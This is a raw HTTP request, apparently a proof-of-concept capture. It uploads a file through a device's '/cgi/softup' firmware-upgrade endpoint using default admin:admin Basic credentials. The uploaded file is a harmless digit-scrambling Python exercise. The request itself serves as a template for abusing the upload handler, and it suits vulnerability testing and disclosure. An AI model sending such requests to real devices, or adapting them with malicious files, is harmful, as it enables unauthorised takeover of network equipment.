POST /cgi/softup HTTP/1.1
Host: 192.168.69.4:49156
Content-Length: 558
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.69.4:49156
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzb2l6LcGnflBcZzw
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.69.4:49156/mainFrame.htm
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Authorization=Basic YWRtaW46YWRtaW4=
Connection: close

------WebKitFormBoundaryzb2l6LcGnflBcZzw
Content-Disposition: form-data; name="filename"; filename="en.py"
Content-Type: application/octet-stream

n = int(input('请输入一个四位数:'))
if 1000<=n<=9999:
    a=n%10
    b=(n-a)%100/10
    c=(n-a-10*b)%1000/100
    d=(n-a-10*b-100*c)%10000/1000
    a=a*7%10
    b=b*7%10
    c=c*7%10
    d=d*7%10
    n=1000*d+100*c+10*b+a
    print(int(n))
elif n<=1000 or n>=9999:
    print("您输入的数字不符合要求，请输入一个四位数")

------WebKitFormBoundaryzb2l6LcGnflBcZzw--
